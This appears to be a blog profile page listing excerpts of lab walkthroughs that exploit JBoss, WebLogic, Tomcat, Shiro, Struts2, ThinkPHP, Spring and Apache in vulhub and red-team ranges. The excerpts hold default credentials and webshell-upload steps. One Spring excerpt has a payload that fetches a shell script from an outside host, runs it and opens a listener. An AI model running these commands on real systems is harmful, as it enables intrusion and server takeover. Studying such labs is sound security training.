- 博客(67)
- 收藏
- 关注
原创 Vulnstack红日安全内网域渗透靶场2实战攻略
作者把外网网段都写成了192.168.111.1/24,我们可以就进到选择了NAT网段的服务器中(WEB和PC),把第一块网卡的IP从111改成自己的NAT网段,我的是216,修改网络需要输入管理员administrator/1qaz@WSX。1.直接ipconfig /all 看到域de1ay.com,发现是双网卡,10.10.10.1/24为内网的网段,意味着很有可能域控为10.10.10.10(域控一般就是dns的服务器)放1433端口,就存在mssql服务,可能存在爆破/注入/SA弱口令。
2024-12-11 10:53:45
1334
1
原创 ATT&CK红队评估实战红日靶场一
3.至此网络配置完成,现在可以登进去每个服务器看一看,是不是成功获取了IP,这三台虚拟主机默认开机密码都是 hongrisec@2019。那么如果修改 general_log_file 的值,则所执行的 SQL 语句就会对应生成对应的文件中,进而可 Getshell。2.这里发现权限是GOD/Administrator,这里就有一个很关键的地方,根据之前webshell中查看的ip信息,发现是存在双网卡的,这里可以判断是存在域的,所以这里先来抓取密码。8.将一句话木马写入 shw.php 文件中。
2024-12-11 10:40:28
731
原创 vulhub Jboss 漏洞攻略
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏任意代码执⾏这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了⽤户传⼊的对象,然后我们利⽤Apache Commons Collections中的 Gadget 执⾏任意代码。
2024-09-30 08:56:44
1379
原创 Shiro rememberMe反序列化漏洞(Shiro-550) 靶场攻略
漏洞原理漏洞原理Apache Shiro框架提供了记住密码的功能(RememberMe),⽤户登录成功后会⽣成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。那么,Payload产⽣的过程:命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值在整个漏洞利⽤过程中,⽐较重要的是AES加密的密钥,如果没有修改默认的密钥那么就很。
2024-09-23 17:53:01
460
原创 struts2 S2-057远程执行代码漏洞 靶场攻略
环境环境vulhub靶场 /struts2/s2-057漏洞简介漏洞产⽣于⽹站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使⽤通配符namespace时,可能会导致远程代码执⾏漏洞的发⽣。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使⽤通配符namespace,从⽽导致远程代码执⾏漏洞的发⽣。
2024-09-23 17:16:31
248
原创 Thinkphp5x远程命令执行 靶场攻略
环境配置 云服务器:47.113.231.0:8080 靶场:vulhub/thinkphp/5-rce docker-compose up -d #启动环境 漏洞复现1.访问靶场:http://47.113.231.0:8080/ 2.远程命令执⾏ POC: ? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=
2024-09-23 17:05:12
453
原创 spring 代码执行(CVE-2018-1273) 靶场攻略
vulhub/spring/CVE-2018-1273username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/zcc")]=&password=&repeatedPassword=/usr/bin/wget -qO /tmp/shw.sh http://47.113.231.0/shw.sh/bin/bash /tmp/shw.shnc -lvvp 6666
2024-09-23 13:36:36
274
原创 Apache CVE-2021-41773 漏洞攻略
该漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录<Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利⽤该路径穿越漏洞读取到Web⽬录之外的其他⽂件在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)
2024-09-22 11:27:52
468
原创 Jboss 低版本JMX Console未授权
漏洞描述漏洞描述此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者可以进⼊到 jmx控制台,并在其中执⾏任何功能。影响范围Jboss4.x以下环境搭建漏洞复现1.访问2.这⾥我们使⽤得复现环境不存在,所以需要密码(正常环境⽆需密码直接可进⼊)
2024-09-20 20:18:27
239
原创 Jboss ⾼版本JMX Console未授权
JMX Console默认存在未授权访问,直接点击JBoss主⻚中的 JMX Console 链接进⼊JMX Console⻚⾯, 通过部署war包 , getshell。2.进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏远程部署。在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer,如下。3.搭建远程部署 , 部署远程war包地址。
2024-09-20 20:06:00
326
原创 Jboss Administration Console弱⼝令
Administration Console管理⻚⾯存在弱⼝令,`admin:admin`,登陆后台上传war包 , getshell。因为这⾥⽤的环境是CVE-2017-12149的靶机。账户密码:admin:vulhub。3.上传后⻔ shell.war。4.连接WebShell。
2024-09-20 19:47:18
251
原创 Jboss CVE-2017-12149 靶场攻略
该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter过滤器中。该过滤器在没有进⾏任何安全检查的情况下尝试将来⾃客户端的数据流进⾏反序列化,从⽽导。该漏洞出现在/invoker/readonly中 ,服务器将⽤户post请求内容进⾏反序列化。返回500,说明⻚⾯存在,此⻚⾯存在反序列化漏洞。2.验证是否存在漏洞 , 访问。
2024-09-20 19:39:06
388
原创 Jboss CVE-2017-7504 靶场攻略
漏洞介绍漏洞介绍JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏任意代码执⾏影响范围JBoss 4.x 以及之前的所有版本环境搭建漏洞复现1.访问漏洞地址。
2024-09-20 19:29:56
234
原创 Jboss CVE-2015-7501 靶场攻略
漏洞介绍漏洞介绍这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了⽤户传⼊的对象,然后我们利⽤Apache Commons Collections中的 Gadget 执⾏任意代码影响范围环境搭建漏洞复现1.POC,访问地址返回如下,说明接⼝开放,此接⼝存在反序列化漏洞2.下载 ysoserial ⼯具进⾏漏洞利⽤将反弹shell进⾏base64编码">exp.ser3.服务器设置监听得端⼝4.执⾏命令curl。
2024-09-20 19:15:57
455
原创 weblogic CVE-2020-14882 靶场攻略
使⽤这两个漏洞链,未经身份验证的远程攻击者可以通过 HTTP 在 Oracle WebLogic 服务器上执⾏任意命令并完全控制主机。可以利⽤第⼆个漏洞(CVE-2020-14883),远程加载XML⽂件拿到Shell。CVE-2020-14883 允许经过身份验证的⽤户在管理员控制台组件上执⾏任何命令。CVE-2020-14882 允许远程⽤户绕过管理员控制台组件中的身份验证。3.⾸先访问以下 URL ,以连接 2 个漏洞并执⾏以下命令。我们进⼊到docker中可以看到命令已经成功运⾏了。
2024-09-20 19:00:33
505
原创 weblogic CVE-2018-2894 靶场攻略
漏洞描述漏洞描述Weblogic Web Service Test Page中⼀处任意⽂件上传漏洞,Web Service Test Page 在 "⽣产模式"下默认不开启,所以该漏洞有⼀定限制。漏洞版本28环境搭建。
2024-09-20 18:51:55
664
原创 weblogic CVE-2018-2628 靶场攻略
Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应⽤程序的每个Java虚拟机(JVM)中,并创建T3协议通信连接, 将流量传输到Java虚拟机. T3协议在开放WebLogic控制台端⼝的应⽤上默认开。Weblogic Server中的RMI 通信使⽤T3协议在Weblogic Server和其它Java程序(客户端或者其它。启, 攻击者可以通过T3协议发送恶意的的反序列化数据, 进⾏反序列化, 实现对存在漏洞的weblogic组件。的远程代码执⾏攻击。
2024-09-20 18:34:25
254
原创 weblogic CVE-2019-2725 靶场攻略
漏洞描述漏洞描述wls9-async等组件为WebLogic Server提供异步通讯服务,默认应⽤于WebLogic部分版本。由于该WAR包在反序列化处理输⼊信息时存在缺陷,攻击者通过发送精⼼构造的恶意 HTTP 请求,即可获得⽬标服务器的权限,在未授权的情况下远程执⾏命令。影响版本环境搭建漏洞复现1.漏洞验证如果出现⼀下⻚⾯,则说明存在漏洞。
2024-09-20 18:27:53
2104
原创 weblogic CVE-2017-3506 靶场攻略
Weblogic的WLS Security组件对外提供了webserver服务,其中使⽤了XMLDecoder来解析⽤户输⼊的XML数据,在解析过程中出现反序列化漏洞,可导致任意命令执⾏。受影响版本:WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.1, 12.2.1.2。访问以下⽬录中的⼀种,有回显如下图可以判断wls-wsat组件存在。2.在当前⻚⾯抓包之后,添加下⾯请求包,反弹shell。1.验证是否存在wls-wsat组件。
2024-09-20 18:19:46
659
原创 WebLogic 后台弱⼝令GetShell
weblogic常⽤弱⼝令:https://cirt.net/passwords?通过弱⼝令进⼊后台界⾯ , 上传部署war包 , getshell。2.上传war包,jsp⽊⻢压缩成zip,修改后缀为war,上传。默认账号密码:weblogic/Oracle@123。这⾥注意, 单个账号错误密码5次之后就会⾃动锁定。1.登录后台后,点击部署,点击安装,点击上传⽂件。3.访问部署好的war,工具连接。全版本(前提后台存在弱⼝令)
2024-09-20 17:57:41
587
原创 Tomcat CVE-2020-1938 靶场攻略
tomcat默认的conf/server.xml中配置了2个Connector,⼀个为 8080 的对外提供的HTTP协议端⼝,另。由于Tomcat AJP协议设计上的缺陷,攻击者通过Tomcat AJP Connector 可以读取或包含Tomcat上所。Tomcat 7系列 <7.0.100 Tomcat 8系列 < 8.5.51 Tomcat 9 系列 <9.0.31。此外如果⽬标应⽤有⽂件上传的功能情况下,配合为⽂件包含漏洞利⽤GetShell。可以读取webapp配置⽂件或源码⽂件。
2024-09-20 17:43:40
315
原创 Tomcat 后台弱⼝令部署war包
2.文件上传成功后,默认会在网站根目录下生成和war包名称⼀致得目录,然后目录中得木马就是压缩前的文件名,Webshell客户端⼯具进⾏连接。在tomcat8环境下默认进⼊后台的密码为 tomcat/tomcat ,未修改造成未授权即可进⼊后台,或者管理员把密码设置成弱⼝令。将JSP⽊⻢压缩为ZIP格式,然后修改后缀为war就可以了。默认密码:tomcat/tomcat。全版本(前提是⼈家存在弱⼝令)1.制作WAR包,上传。
2024-09-20 17:35:16
474
原创 Tomcat CVE-2017-12615 靶场攻略
漏洞描述漏洞描述当 Tomcat运⾏在Windows操作系统时,且启⽤了HTTP PUT请求⽅法(例如,将 readonly初始化参数由默认值设置为false),攻击者将有可能可通过精⼼构造的攻击请求数据包向服务器上传包含任意代的 JSP ⽂件,JSP⽂件中的恶意代码将能被服务器执⾏。导致服务器上的数据泄露或获取服务器权限。漏洞原理当在Tomcat的conf(配置⽬录下)/web.xml配置⽂件中添加readonly设置为false时,将导致该漏洞产。
2024-09-20 17:25:17
735
原创 dedecms靶场(四种webshell姿势)
2.点击【生成】【更新主页HTML】将主页位置修改为【./index.php】点击 【生成静态】点击 【更新主页HTML】 再次访问站点首页可发现变化..
2024-09-14 18:41:02
834
原创 vulhub spring 远程命令执行漏洞(CVE-2022-22963)
vulhub spring 远程命令执行漏洞(CVE-2022-22963)
2024-09-08 12:38:03
577
原创 vulhub GhostScript 沙箱绕过(CVE-2018-16509)
cd vulhub/ghostscript/CVE-2018-16509 #进入漏洞环境所在目录。docker-compose up -d #启动靶场。docker ps #查看容器信息。
2024-09-07 11:45:00
407
原创 vulhub Thinkphp5 2-rce远程代码执行漏洞
cd /vulhub/thinkphp/2-rce #进入漏洞环境所在目录。docker-compose up -d #启动靶场。docker ps #查看容器信息。
2024-09-07 10:46:32
443
HTTP.SYS远程代码执⾏(MS15-034) MS->Microsoft 2015 -034
2024-09-23
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人